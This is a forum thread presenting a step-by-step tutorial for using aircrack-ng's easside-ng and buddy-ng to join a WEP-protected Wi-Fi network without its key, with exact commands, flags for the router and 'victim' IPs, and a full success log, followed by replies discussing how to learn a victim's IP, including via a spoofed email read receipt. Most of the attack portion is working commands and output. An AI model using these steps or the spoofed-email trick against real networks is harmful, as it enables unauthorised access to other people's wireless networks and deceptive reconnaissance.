Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: Aircrack-ng new tools Using easside-ng on bt2

  1. #1
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Aircrack-ng new tools Using easside-ng on bt2

    Hey guys

    Because I've now got my atheros card writing prga's properly I've been able to test these new tools Here is a link to my patched drivers for atheros cards, it is a dirty fix until madwifi guys sort it but works fine for me and a few privileged friends that have the skill . Just download make and make install


    NEW DRIVERS v1.2 27-11-07

    http://www.mediafire.com/?5z1tl4tchmq

    easside-ng is described as a wep magic wand tool for connecting to wep encrypted wireless networks without a WEP key. It does this by sniffing packets from a legit user and uses these packets and the PRGA (pseudo random generation algorithm) xor data to encrypt new viable packets.

    easside-ng works in two stages. First thing easside has to establish basic connectivity between easside-ng, buddy server and the access point. Once achieved easside-ng will attempt to communicate with the WIFI network. If successful you should be able to connect to the router and do just about anything .

    Aircrack-ng guys describe this tool as stable but I wouldn't doesn't work all the time and it only works with open authentication systems.

    Another downside is easside-ng and wesside-ng are useless at guessing the ip addys at the mo so for testing purposes you may benefit telling easside-ng what ip addys to use. This is because easside-ng uses .1 as default for the last digit in the users IP and .123 for the routers. Another point is easside-ng requires a valid client using the internet and not just static.

    Enough with the rabbling more info at http://aircrack-ng.org/doku.php?id=easside-ng now lets begin

    First thing to do is setup a buddy server.

    Code:
    buddy-ng
    It should respond

    Code:
     buddy-ng
     Waiting for connexion
    Now check your buddy server is running open up a internet browser and type in the address bar

    Code:
    http://127.0.0.1:6969
    Go back to the buddy window and you should now see

    Code:
     Waiting for connexion
     Got connection from 127.0.0.1
     That was it !
     Waiting for connexion
    If you see this excellent we are ready for easside-ng this example is using the ip addy's required. This is because I know the ip pool and subnet. Easside-ng can guess the ip pool and gateway but as default it adds .123 to the end of the gateway and .1 to the ip address.

    Code:
    mkdir temp
    cd temp
    modprobe tun
    easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
    Lets break it down

    -s is the ip addy of the buddy server (you)
    -f is the adaptor I am using
    -r is the ip addy of the router
    -v is the mac addy of the router
    -i is the victims ip addy

    Now if the hack was successful you should see the following on easside-ng shell

    Code:
    drgr33n crap # easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
    Setting tap MTU
    Sorting out wifi MAC
    MAC is 00:01:02:EC:8F:1A
    Setting tap MAC
    [14:15:45.929815] Ownin...
    Chan 07
    SSID Hack-me Chan 7 Mac 00:DE:ff:00:ff:00
    Sending auth request
    Authenticated
    Sending assoc request
    Associated: 1
    Unknown mgmt subtype 30
    Assuming ARP 36
    [14:16:11.424675] Got 22 bytes of PRGA IV [E3:67:7D]
    [14:16:11.430123] Got 58 bytes of PRGA IV [E5:67:7D]
    [14:16:11.539501] Got 166 bytes of PRGA IV [E8:67:7D]
    [14:16:11.660668] Got 490 bytes of PRGA IV [E9:67:7D]
    [14:16:11.784641] Got 1462 bytes of PRGA IV [EA:67:7D]
    [14:16:12.027078] Got 1504 bytes of PRGA IV [EC:67:7D]
    Sending who has 192.168.1.254 tell 192.168.1.64
    Rtr MAC 00:ff:00:ff:77:F0
    Trying to connect to buddy: 127.0.0.1:6969
    Connected
    Handshake compl33t
    Checking for internet... 1
    Checking for internet... 2
    Checking for internet... 3
    Internet w0rx.  Public IP 127.0.0.1
    Rtt 82ms
    Now bring your virtual network deice up

    Code:
    ifconfig at0 up
    And you should be rockin

    Another cool thing is you can use easside's prga data with wesside just navigate to the same temp folder and run wesside-ng to flood the network and grab the wep key. Aircrack cru are calling this "besside-ng" lol

    Enjoy

  2. #2
    Junior Member
    Join Date
    Oct 2007
    Posts
    26

    Default

    nice one

    but so weird that my alfa usb adapter can´t do this :'(

    greetings

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools dont do much better. For one How am I going to know the victim IP If I'm out side the LAN.

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by purehate View Post
    I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools dont do much better. For one How am I going to know the victim IP If I'm out side the LAN.



    E-mail receipt from victim?


    ***EDIT***

    -OR-

    If it's WEP encrypted, use Korek Chopchop method to get it.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Quote Originally Posted by -=Xploitz=- View Post



    E-mail receipt from victim?
    LOL!

    "Dear Dumb Hacker, You used your tool against my Wireless Lan, but it's not 192.168.1.1, it's 192.168.100.1, You noob, get it right the next time you hack into my wifi!"

    Love always, Your Neighbor.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  6. #6
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by spankdidly View Post
    LOL!

    "Dear Dumb Hacker, You used your tool against my Wireless Lan, but it's not 192.168.1.1, it's 192.168.100.1, You noob, get it right the next time you hack into my wifi!"

    Love always, Your Neighbor.
    LOL!!


    But on the serious side..did you see my edit?

    Thats the only real way I can think of accomplishing this unless you use Kismet,.... or,.... open a capture in Wireshark maybe and search for the IP,.. or you actually do a spoofed email, and request a delivery return receipt.

    BTW..I was kinda serious about the whole E-mail return receipt thing. If you send someone an Email..you can (with some Email clients) request a return receipt..much like our forums PM system is setup...and get their IP that way. I just don't suggest using your real E-mail address if your a wanna be blackhat..because you could get caught and you could get into trouble.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  7. #7
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    lol it should guess the ip and gateway but its rubbish might be because of my dirty drivers now uploading v1.1 with support for much more cards.

  8. #8
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    This is exactly my point. Why go through all this crap when wep can be broken almost as fast as I can type the commands.

  9. #9
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    because I'm doing a uni course and this is going to score me extra points but yes I see your point purehate aircrack will crack 64 bit wep with around 10000 ivs

  10. #10
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Quote Originally Posted by purehate View Post
    This is exactly my point. Why go through all this crap when wep can be broken almost as fast as I can type the commands.
    I think it was more of a "See, this is what else we can do with wep". Of course it's more of a hassle to do it that way. It doesn't make sense. But I'm sure somebody felt pretty cool when they figured it out. It is cool, but there's no need for it.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •